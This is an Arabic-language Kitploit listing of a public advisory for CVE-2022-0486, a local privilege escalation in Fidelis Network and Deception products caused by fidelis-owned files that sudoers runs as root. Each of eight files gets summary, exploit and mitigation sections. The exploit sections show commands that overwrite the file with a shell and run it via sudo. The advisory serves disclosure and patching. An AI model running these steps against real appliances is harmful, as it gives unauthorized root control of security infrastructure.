Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-0486 — Fidelis Network and Deception - تصعيد الامتيازات بسبب صلاحيات الملفات غير الآمنة - متعدد | Kitploit
أدوات/GitHubGitHub/henryreed/cve-2022-0486
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمراستغلال الملفات الثنائية
GitHubhenryreed/cve-2022-0486

CVE-2022-0486

Fidelis Network and Deception - تصعيد الامتيازات بسبب صلاحيات الملفات غير الآمنة - متعدد

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

شبكة Fidelis والتضليل - CVE-2022-0486 - تصعيد الامتيازات عبر صلاحيات ملفات غير آمنة - متعدد

الإصدار والإشعارات

تمت الموافقة على جميع أدوات الاستغلال للنشر العام من قبل حكومة الولايات المتحدة. شكر خاص للعسكريين والموظفين الحكوميين المسؤولين عن الموافقة على الوثائق للتوزيع غير المحدود. يُرجى الرجوع إلى أرقام OTR التالية:

  • OTR-2022-00482
  • OTR-2022-00483
  • OTR-2022-00484
  • OTR-2022-00485
  • OTR-2022-00486
  • OTR-2022-00488
  • OTR-2022-00489
  • OTR-2022-00490

البيانات الوصفية

التاريخ: 20220517 2005H UTC

مؤلف الاستغلال: Henry Reed، The Aerospace Corporation

الصفحة الرئيسية للبائع: https://fidelissecurity.com/

الإصدارات المتأثرة:

  • Fidelis CommandPost قبل الإصدار 9.4.5
  • Fidelis Collector قبل الإصدار 9.4.5
  • Fidelis Sensor قبل الإصدار 9.4.5
  • Fidelis Sandbox قبل الإصدار 9.4.5

تم الاختبار على:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

CVE: CVE-2022-0486

وصف CVE: تؤدي صلاحيات الملفات غير السليمة في مكونات CommandPost وCollector وSensor وSandbox في شبكة Fidelis والتضليل إلى تمكين المهاجم الذي لديه صلاحيات إدارة محلية على واجهة سطر الأوامر من تعديل الملفات المتأثرة وتمكين تصعيد الامتيازات المكافئة للمستخدم الجذر. توجد الثغرة في إصدارات شبكة Fidelis والتضليل السابقة عن 9.4.5. تتوفر التصحيحات والتحديثات لمعالجة هذه الثغرة.

الخلاصة الأساسية

توجد العديد من أدوات الاستغلال ضمن هذه الـ CVE، حيث تغطي الـ CVE سلسلة من صلاحيات الملفات غير السليمة. جميع أدوات الاستغلال ناتجة عن منح صلاحية NOPASSWD واحدة والعديد من صلاحيات sudoers التي تتطلب كلمة مرور لمستخدم fidelis على ملفات ثنائية أو نصوص برمجية يملكها مستخدم fidelis، وبالتالي السماح لمستخدم fidelis بتعديل الملف بشكل تعسفي. وهذا يسمح بتصعيد الامتيازات محلياً.

الملف المتأثر بدون كلمة مرور:

  • /FSS/bin/shutdown.pl

الملفات المتأثرة التي تتطلب كلمة مرور:

  • /FSS/setup/cert_mgmt
  • /FSS/bin/db_updater
  • /FSS/deception-manager/bin/deception-manager
  • /FSS/sbin/fssdbg.sh
  • /FSS/bin/mst
  • /FSS/bin/setup
  • /FSS/setup/unlock_cp_user.sh

يُوصى لمستخدمي Fidelis Deception أو Fidelis Network المتأثرين بتحديث برامجهم لتصحيح هذه الثغرة. يُوصى أيضاً لجميع المستخدمين، بغض النظر عما إذا كانوا متأثرين بهذه الثغرة أم لا، بتعطيل الوصول إلى الصدفة لمنتجات Fidelis الخاصة بهم بعد التهيئة الأولية.

إذا لم يكن أي من هذين الإجراءين ممكناً لسبب ما، يتم وصف إجراء تخفيف لكل ملف ضعيف في هذا المستند. بناءً على اختبار المؤلف، يبدو أن المستخدمين سيحتاجون إلى استخدام إحدى هذه الثغرات لتصعيد الامتيازات قبل أن يتمكنوا من تطبيق إجراءات التخفيف الموصوفة، لذا يُوصى بشدة بتحديث Fidelis وتعطيل SSH بدلاً من ذلك.

Shutdown.pl تصعيد الامتيازات

تم الاختبار على:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

ملخص:

تسمح صلاحيات الملكية غير الصحيحة على /FSS/bin/shutdown.pl لمستخدم fidelis بتصعيد الامتيازات المكافئة للمستخدم الجذر في العديد من منتجات Fidelis. بشكل افتراضي، يسمح تكوين sudoers لمستخدم fidelis بتنفيذ /FSS/bin/shutdown.pl كمستخدم جذر دون المطالبة بكلمة مرور. الملف مملوك لمستخدم fidelis، مما يسمح لمستخدم fidelis بتعديل البرنامج النصي بشكل تعسفي وتصعيد الامتيازات.

استغلال:

  1. تغيير الصلاحيات للسماح بتعديل ملف shutdown.pl:
root@kitploit:~
$ chmod 700 /FSS/bin/shutdown.pl
  1. تغيير الملف حسب الحاجة لتنفيذ كود تعسفي أو، في هذا المثال، إنشاء صدفة:
root@kitploit:~
$ echo '#!/usr/bin/perl -w' > /FSS/bin/shutdown.pl
$ echo "exec '/bin/sh';" >> /FSS/bin/shutdown.pl
$ cat /FSS/bin/shutdown.pl
#!/usr/bin/perl -w
exec '/bin/sh';
  1. تشغيل الملف باستخدام الأمر sudo:
root@kitploit:~
$ sudo /FSS/bin/shutdown.pl

لقطة شاشة توضح اكتشاف الثغرة واستغلالها. لاحظ سطر NOPASSWD الذي يشير إلى أن shutdown.pl مرشح محتمل لتصعيد الامتيازات:

تخفيف:

تغيير مالكي المستخدم والمجموعة لـ /FSS/bin/shutdown.pl إلى root:fidelis والسماح فقط بصلاحيات القراءة والتنفيذ لمالك المجموعة لـ /FSS/bin/shutdown.pl من شأنه تخفيف هذه الثغرة:

cert_mgmt تصعيد الامتيازات الموثق

تم الاختبار على:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

ملخص:

تسمح صلاحيات الملكية غير الصحيحة على /FSS/setup/cert_mgmt لمستخدم fidelis بتصعيد الامتيازات المكافئة للمستخدم الجذر في العديد من منتجات Fidelis. بشكل افتراضي، يسمح تكوين sudoers لمستخدم fidelis بتنفيذ /FSS/setup/cert_mgmt كمستخدم جذر إذا تم توفير كلمة مرور. الملف مملوك لمستخدم fidelis، مما يسمح لمستخدم fidelis بتعديل البرنامج النصي بشكل تعسفي وتصعيد الامتيازات.

استغلال:

  1. تغيير الصلاحيات للسماح بتعديل ملف cert_mgmt:
root@kitploit:~
$ chmod u+w /FSS/setup/cert_mgmt
  1. تغيير الملف حسب الحاجة لتنفيذ كود تعسفي أو، في هذا المثال، إنشاء صدفة:
root@kitploit:~
$ cp /bin/bash /FSS/setup/cert_mgmt
  1. تشغيل الملف باستخدام الأمر sudo والمصادقة بكلمة مرور مستخدم fidelis:
root@kitploit:~
$ sudo /FSS/setup/cert_mgmt

لقطة شاشة توضح اكتشاف الثغرة واستغلالها:

تخفيف:

تغيير مالكي المستخدم والمجموعة لـ /FSS/setup/cert_mgmt إلى root:fidelis والسماح فقط بصلاحيات القراءة والتنفيذ لمالك المجموعة لـ /FSS/setup/cert_mgmt من شأنه تخفيف هذه الثغرة:

db_updater تصعيد الامتيازات الموثق

تم الاختبار على:

  • Fidelis CommandPost 9.4.3

ملخص:

تسمح صلاحيات الملكية غير الصحيحة على /FSS/bin/db_updater لمستخدم fidelis بتصعيد الامتيازات المكافئة للمستخدم الجذر في Fidelis CommandPost. بشكل افتراضي، يسمح تكوين sudoers لمستخدم fidelis بتنفيذ /FSS/bin/db_updater كمستخدم جذر إذا تم توفير كلمة مرور. الملف مملوك لمستخدم fidelis، مما يسمح لمستخدم fidelis بتعديل الملف الثنائي بشكل تعسفي وتصعيد الامتيازات.

استغلال:

  1. تغيير الصلاحيات للسماح بتعديل ملف db_updater:
root@kitploit:~
$ chmod u+w /FSS/bin/db_updater
  1. تغيير الملف حسب الحاجة لتنفيذ كود تعسفي أو، في هذا المثال، إنشاء صدفة:
root@kitploit:~
$ cp /bin/bash /FSS/bin/db_updater
  1. تشغيل الملف باستخدام الأمر sudo والمصادقة بكلمة مرور مستخدم fidelis:
root@kitploit:~
$ sudo /FSS/bin/db_updater

تخفيف:

تغيير مالكي المستخدم والمجموعة لـ /FSS/bin/db_updater إلى root:fidelis والسماح فقط بصلاحيات القراءة والتنفيذ لمالك المجموعة لـ /FSS/bin/db_updater من شأنه تخفيف هذه الثغرة:

deception-manager تصعيد الامتيازات الموثق

تم الاختبار على:

  • Fidelis CommandPost 9.4.3

ملخص:

تسمح صلاحيات الملكية غير الصحيحة على /FSS/deception-manager/bin/deception-manager لمستخدم fidelis بتصعيد الامتيازات المكافئة للمستخدم الجذر في Fidelis CommandPost. بشكل افتراضي، يسمح تكوين sudoers لمستخدم fidelis بتنفيذ /FSS/deception-manager/bin/deception-manager كمستخدم جذر إذا تم توفير كلمة مرور. الملف مملوك لمستخدم fidelis، مما يسمح لمستخدم fidelis بتعديل الملف الثنائي بشكل تعسفي وتصعيد الامتيازات.

استغلال:

  1. تغيير الملف حسب الحاجة لتنفيذ كود تعسفي أو، في هذا المثال، إنشاء صدفة:
root@kitploit:~
$ cp /bin/bash /FSS/deception-manager/bin/deception-manager
  1. تشغيل الملف باستخدام الأمر sudo والمصادقة بكلمة مرور مستخدم fidelis:
root@kitploit:~
$ sudo /FSS/deception-manager/bin/deception-manager

لقطة شاشة توضح اكتشاف الثغرة واستغلالها:

تخفيف:

تغيير مالكي المستخدم والمجموعة لـ /FSS/deception-manager/bin/deception-manager إلى root:fidelis والسماح فقط بصلاحيات القراءة والتنفيذ لمالك المجموعة لـ /FSS/deception-manager/bin/deception-manager من شأنه تخفيف هذه الثغرة:

fssdbg.sh تصعيد الامتيازات الموثق

تم الاختبار على:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

ملخص:

تسمح صلاحيات الملكية غير الصحيحة على /FSS/sbin/fssdbg.sh لمستخدم fidelis بتصعيد الامتيازات المكافئة للمستخدم الجذر في العديد من منتجات Fidelis. بشكل افتراضي، يسمح تكوين sudoers لمستخدم fidelis بتنفيذ /FSS/sbin/fssdbg.sh كمستخدم جذر إذا تم توفير كلمة مرور. الملف مملوك لمستخدم fidelis، مما يسمح لمستخدم fidelis بتعديل البرنامج النصي بشكل تعسفي وتصعيد الامتيازات.

استغلال:

  1. تغيير الصلاحيات للسماح بتعديل ملف fssdbg.sh:
root@kitploit:~
$ chmod u+w /FSS/sbin/fssdbg.sh
  1. تغيير الملف حسب الحاجة لتنفيذ كود تعسفي أو، في هذا المثال، إنشاء صدفة:
root@kitploit:~
$ cp /bin/bash /FSS/sbin/fssdbg.sh
  1. تشغيل الملف باستخدام الأمر sudo والمصادقة بكلمة مرور مستخدم fidelis:
root@kitploit:~
$ sudo /FSS/sbin/fssdbg.sh

لقطة شاشة توضح اكتشاف الثغرة واستغلالها:

تخفيف:

تغيير مالكي المستخدم والمجموعة لـ /FSS/sbin/fssdbg.sh إلى root:fidelis والسماح فقط بصلاحيات القراءة والتنفيذ لمالك المجموعة لـ /FSS/sbin/fssdbg.sh من شأنه تخفيف هذه الثغرة:

mst تصعيد الامتيازات الموثق

تم الاختبار على:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

ملخص:

تسمح صلاحيات الملكية غير الصحيحة على /FSS/bin/mst لمستخدم fidelis بتصعيد الامتيازات المكافئة للمستخدم الجذر في العديد من منتجات Fidelis. بشكل افتراضي، يسمح تكوين sudoers لمستخدم fidelis بتنفيذ /FSS/bin/mst كمستخدم جذر إذا تم توفير كلمة مرور. الملف مملوك لمستخدم fidelis، مما يسمح لمستخدم fidelis بتعديل الملف الثنائي بشكل تعسفي وتصعيد الامتيازات.

استغلال:

  1. تغيير الصلاحيات للسماح بتعديل ملف mst:
root@kitploit:~
$ chmod u+w /FSS/bin/mst
  1. تغيير الملف حسب الحاجة لتنفيذ كود تعسفي أو، في هذا المثال، إنشاء صدفة:
root@kitploit:~
$ cp /bin/bash /FSS/bin/mst
  1. تشغيل الملف باستخدام الأمر sudo والمصادقة بكلمة مرور مستخدم fidelis:
root@kitploit:~
$ sudo /FSS/bin/mst

لقطة شاشة توضح اكتشاف الثغرة واستغلالها:

تخفيف:

تغيير مالكي المستخدم والمجموعة لـ /FSS/bin/mst إلى root:fidelis والسماح فقط بصلاحيات القراءة والتنفيذ لمالك المجموعة لـ /FSS/bin/mst من شأنه تخفيف هذه الثغرة. فيما يلي لقطة شاشة توضح تخفيف تصعيد الامتيازات ومقتطف من إخراج أمر mst عند تشغيله بواسطة fidelis بدون sudo:

لقطة شاشة توضح أنه حتى مع التخفيف، لا يزال بإمكان مستخدم fidelis تشغيل الأمر كـ sudo:

لقطة شاشة توضح أنه لا يمكن تعديل mst لتشغيل كود تعسفي آخر عند استخدام التخفيف:

setup تصعيد الامتيازات الموثق

تم الاختبار على:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

ملخص:

تسمح صلاحيات الملكية غير الصحيحة على /FSS/bin/setup لمستخدم fidelis بتصعيد الامتيازات المكافئة للمستخدم الجذر في العديد من منتجات Fidelis. بشكل افتراضي، يسمح تكوين sudoers لمستخدم fidelis بتنفيذ /FSS/bin/setup كمستخدم جذر إذا تم توفير كلمة مرور. الملف مملوك لمستخدم fidelis، مما يسمح لمستخدم fidelis بتعديل الملف الثنائي بشكل تعسفي وتصعيد الامتيازات.

استغلال:

  1. تغيير الصلاحيات للسماح بتعديل ملف setup:
root@kitploit:~
$ chmod u+w /FSS/bin/setup
  1. تغيير الملف حسب الحاجة لتنفيذ كود تعسفي أو، في هذا المثال، إنشاء صدفة:
root@kitploit:~
$ cp /bin/bash /FSS/bin/setup
  1. تشغيل الملف باستخدام الأمر sudo والمصادقة بكلمة مرور مستخدم fidelis:
root@kitploit:~
$ sudo /FSS/bin/setup

لقطة شاشة توضح اكتشاف الثغرة واستغلالها:

تخفيف:

تغيير مالكي المستخدم والمجموعة لـ /FSS/bin/setup إلى root:fidelis والسماح فقط بصلاحيات القراءة والتنفيذ لمالك المجموعة لـ /FSS/bin/setup من شأنه تخفيف هذه الثغرة:

setup تصعيد الامتيازات الموثق

تم الاختبار على:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

ملخص:

تسمح صلاحيات الملكية غير الصحيحة على /FSS/setup/unlock_cp_user.sh لمستخدم fidelis بتصعيد الامتيازات المكافئة للمستخدم الجذر في العديد من منتجات Fidelis. بشكل افتراضي، يسمح تكوين sudoers لمستخدم fidelis بتنفيذ /FSS/setup/unlock_cp_user.sh كمستخدم جذر إذا تم توفير كلمة مرور. الملف مملوك لمستخدم fidelis، مما يسمح لمستخدم fidelis بتعديل البرنامج النصي بشكل تعسفي وتصعيد الامتيازات.

استغلال:

  1. تغيير الصلاحيات للسماح بتعديل ملف unlock_cp_user.sh:
root@kitploit:~
$ chmod u+w /FSS/setup/unlock_cp_user.sh
  1. تغيير الملف حسب الحاجة لتنفيذ كود تعسفي أو، في هذا المثال، إنشاء صدفة:
root@kitploit:~
$ cp /bin/bash /FSS/setup/unlock_cp_user.sh
  1. تشغيل الملف باستخدام الأمر sudo والمصادقة بكلمة مرور مستخدم fidelis:
root@kitploit:~
$ sudo /FSS/setup/unlock_cp_user.sh

لقطة شاشة توضح اكتشاف الثغرة واستغلالها:

تخفيف:

تغيير مالكي المستخدم والمجموعة لـ /FSS/setup/unlock_cp_user.sh إلى root:fidelis والسماح فقط بصلاحيات القراءة والتنفيذ لمالك المجموعة لـ /FSS/setup/unlock_cp_user.sh من شأنه تخفيف هذه الثغرة:

تنزيل الأداة